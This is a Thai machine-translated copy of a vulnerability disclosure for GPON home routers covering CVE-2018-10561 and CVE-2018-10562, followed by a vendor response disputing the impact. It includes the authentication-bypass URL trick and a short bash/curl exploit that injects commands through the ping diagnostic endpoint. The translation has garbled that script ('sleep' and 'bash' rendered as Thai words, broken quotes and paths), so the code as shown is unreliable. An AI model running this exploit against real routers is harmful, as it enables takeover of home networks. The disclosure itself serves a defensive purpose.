ช่องโหว่ RCE สำคัญพบได้ในเราเตอร์ GPON โฮมกว่าล้านตัว


การอัปเดตที่สำคัญสองประการนับตั้งแต่มีการเผยแพร่รายงานนี้:

  1. ทีมวิจัยของเราสร้างชุดข้อมูลแก้ไขที่สามารถช่วยผู้ใช้ที่มีผลกระทบ กรุณาตรวจสอบที่นี่
  2. DASAN Zhone Solutions ส่งความคิดเห็นมาให้เราในรายงาน เราแนบมัน“ ตามสภาพ” ในตอนท้ายของหน้านี้

ข้อมูลทั่วไป:

เราทำการประเมินแบบครอบคลุมเกี่ยวกับเราเตอร์ภายในบ้าน GPON จำนวนหนึ่ง เราเตอร์หลายคนในปัจจุบันใช้อินเทอร์เน็ต GPON และ เราพบวิธีเลี่ยงการตรวจสอบทั้งหมดบนอุปกรณ์ (CVE-2018-10561). ด้วยการเลี่ยงผ่านการตรวจสอบนี้, เรายังสามารถเปิดเผยช่องโหว่การฉีดคำสั่งอื่นได้ (CVE-2018-10562) และดำเนินการคำสั่งบนอุปกรณ์.

การใช้ประโยชน์:

ในระหว่างการวิเคราะห์เฟิร์มแวร์ของ GPON เราพบช่องโหว่ที่สำคัญสองแบบ (CVE-2018-10561) & CVE-2018-10562) ที่สามารถรวมกันได้เมื่ออนุญาตให้มีการควบคุมอุปกรณ์และเครือข่าย ช่องโหว่แรกจะใช้กลไกการพิสูจน์ตัวตนของอุปกรณ์ที่มีข้อบกพร่อง ข้อบกพร่องนี้อนุญาตให้ผู้โจมตีใด ๆ เพื่อเลี่ยงผ่านการรับรองความถูกต้องทั้งหมด.

ข้อบกพร่องสามารถพบได้กับเซิร์ฟเวอร์ HTTP ซึ่งตรวจสอบเส้นทางที่เฉพาะเจาะจงเมื่อตรวจสอบความถูกต้อง วิธีนี้ทำให้ผู้โจมตีสามารถบายพาสการพิสูจน์ตัวตนในจุดปลายใด ๆ ด้วยวิธีง่ายๆ.

ด้วยการต่อท้ายภาพ / กับ URL ผู้โจมตีสามารถข้ามจุดสิ้นสุดได้.

ใช้ได้กับทั้งหน้า HTML และ GponForm /

ตัวอย่างเช่นโดยการแทรก

/menu.html?images/
หรือ
/ GponForm / diag_FORM? images /

เราสามารถจัดการอุปกรณ์.

ในขณะที่มองผ่านฟังก์ชั่นอุปกรณ์เราสังเกตเห็นจุดสิ้นสุดการวินิจฉัยที่มีคำสั่ง ping และ traceroute ไม่ต้องคิดมากว่าคำสั่งสามารถถูกฉีดโดยพารามิเตอร์โฮสต์.

เนื่องจากเราเตอร์จะบันทึกผลลัพธ์การ ping เป็น / tmp และส่งไปยังผู้ใช้เมื่อผู้ใช้กลับมา /diag.html จึงค่อนข้างง่ายในการเรียกใช้คำสั่งและเรียกข้อมูลผลลัพธ์ด้วยการพิสูจน์ตัวตนผ่านช่องโหว่.

เรารวมรหัสการใช้ประโยชน์จากเวอร์ชันทุบตีต่อไปนี้:
#! / bin / ทุบตี

echo“ [+] กำลังส่งคำสั่ง…”
# เราส่งคำสั่งด้วยสองโหมด backtick (`) และเซมิโคลอน (;) เพราะโมเดลที่แตกต่างกันจะเรียกใช้อุปกรณ์ที่แตกต่างกัน
curl -k -d“ XWebPageName = diag&diag_action = ping&wan_conlist = 0&dest_host = \ `$ 2 \`; $ 2&ipv = 0” $ 1 / GponForm / diag_Form? images / 2>/ dev / null 1>/ dev / null
echo“ [+] รอ….”
นอนหลับ 3
echo“ [+] การดึง ouput ….”
curl -k $ 1 / diag.html? images / 2>/ dev / null | grep ‘diag_result =‘ | sed -e ‘s / \\ n / \ n / g’

ผลกระทบ:

GPON เป็นเครือข่ายออปติคัลชนิดหนึ่งที่ใช้ไฟเบอร์ออพติกและได้รับความนิยมเป็นพิเศษ เมื่อผู้คนใช้ GPON เราเตอร์จะได้รับจาก ISP ในวิดีโอคุณจะเห็นว่า มากกว่าหนึ่งล้านคนใช้เราเตอร์ระบบเครือข่ายประเภทนี้.

เราได้ทดสอบช่องโหว่นี้กับเราเตอร์ GPON แบบสุ่มจำนวนมากและ พบช่องโหว่ในทุกช่องโหว่. เพราะผู้คนจำนวนมากใช้เราเตอร์ประเภทนี้, ช่องโหว่นี้อาจส่งผลให้เครือข่ายถูกโจมตีทั้งหมด.

คำแนะนำ:

  1. ตรวจสอบว่าเราเตอร์ของคุณใช้เครือข่าย GPON หรือไม่.
  2. โปรดระวังว่าเราเตอร์ GPON นั้นสามารถแฮ็คและใช้ประโยชน์ได้.
  3. พูดคุยกับ ISP ของคุณเพื่อดูว่าพวกเขาสามารถแก้ไขข้อผิดพลาดได้อย่างไร.
  4. เตือนเพื่อนของคุณบน Facebook (คลิกที่นี่เพื่อแชร์) และ Twitter (คลิกที่นี่เพื่อทวีต).

อัปเดต: คำชี้แจงจาก DZS เกี่ยวกับการตรวจสอบการใช้ช่องโหว่

DASAN Zhone Solutions, Inc. ได้ตรวจสอบรายงานสื่อล่าสุดว่าอุปกรณ์ DZS GPON Network Interface Devices (NIDs) หรือที่รู้จักกันทั่วไปว่าเป็นเราเตอร์อาจเสี่ยงต่อการตรวจสอบผ่านช่องโหว่.

DZS ได้พิจารณาแล้วว่าซีรีส์ ZNID-GPON-25xx และ H640series GPON ONT บางอย่างเมื่อทำงานกับการเปิดตัวซอฟต์แวร์เฉพาะนั้นได้รับผลกระทบจากช่องโหว่นี้ บริการไม่ได้รับผลกระทบจากช่องโหว่นี้ถูกรายงานไปยัง DZS จนถึงปัจจุบัน หลังจากการตรวจสอบภายในเราได้พิจารณาแล้วว่าผลกระทบที่อาจเกิดขึ้นนั้นมีขอบเขต จำกัด มากกว่าที่รายงานโดย vpnMentor ตามบันทึกการขายของ DZS รวมกับข้อมูลภาคสนามที่รวบรวมมาจนถึงปัจจุบันเราได้ประเมินว่าจำนวนหน่วย GPON ONT ที่อาจเป็น ที่อาจเกิดขึ้น ส่งผลกระทบน้อยกว่า 240,000 นอกจากนี้เมื่อครบกำหนดสัมพัทธ์ของผลิตภัณฑ์ในวงจรชีวิตของพวกเขาเราคิดว่าผลกระทบนั้น จำกัด อยู่ที่อุปกรณ์ที่น้อยลง.

ประวัติผลิตภัณฑ์

DZS ZNID-GPON-25xx และ ONT H640 ซีรีส์บางอย่างรวมถึงซอฟต์แวร์ที่เปิดตัวช่องโหว่นี้ได้รับการพัฒนาโดยผู้ผลิต OEM และจำหน่ายต่อโดย DZS ออกแบบและวางจำหน่ายมากกว่า 9 ปีที่แล้วผลิตภัณฑ์ส่วนใหญ่มีอายุการใช้งานที่ยั่งยืน เนื่องจากสัญญาการสนับสนุนซอฟต์แวร์ไม่ได้มีให้สำหรับผลิตภัณฑ์เหล่านี้ส่วนใหญ่อีกต่อไปเราจึงไม่มีข้อมูลเชิงลึกโดยตรงถึงจำนวนหน่วยทั้งหมดที่ยังคงใช้อยู่ในพื้นที่.

มติ

DZS ได้แจ้งลูกค้าทุกคนที่ซื้อรุ่นนี้ของช่องโหว่ เรากำลังทำงานกับลูกค้าแต่ละรายเพื่อช่วยให้พวกเขาประเมินวิธีการแก้ไขปัญหาสำหรับหน่วยที่อาจยังคงติดตั้งในฟิลด์ มันขึ้นอยู่กับดุลยพินิจของลูกค้าแต่ละรายในการตัดสินใจว่าจะจัดการกับเงื่อนไขสำหรับอุปกรณ์ที่นำไปใช้งานอย่างไร.

ภารกิจของ DZS คือเพื่อให้แน่ใจว่าโซลูชันทั้งหมดของ บริษัท นั้นตรงตามมาตรฐานความปลอดภัยสูงสุดในอุตสาหกรรม เรายอมรับสิ่งนี้และทุกโอกาสในการตรวจสอบและปรับปรุงวิธีการออกแบบและทดสอบความปลอดภัยของเราอย่างต่อเนื่อง.

Brayan Jackson Administrator
Candidate of Science in Informatics. VPN Configuration Wizard. Has been using the VPN for 5 years. Works as a specialist in a company setting up the Internet.
follow me
Like this post? Please share to your friends:
Leave a Reply

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

76 + = 83

map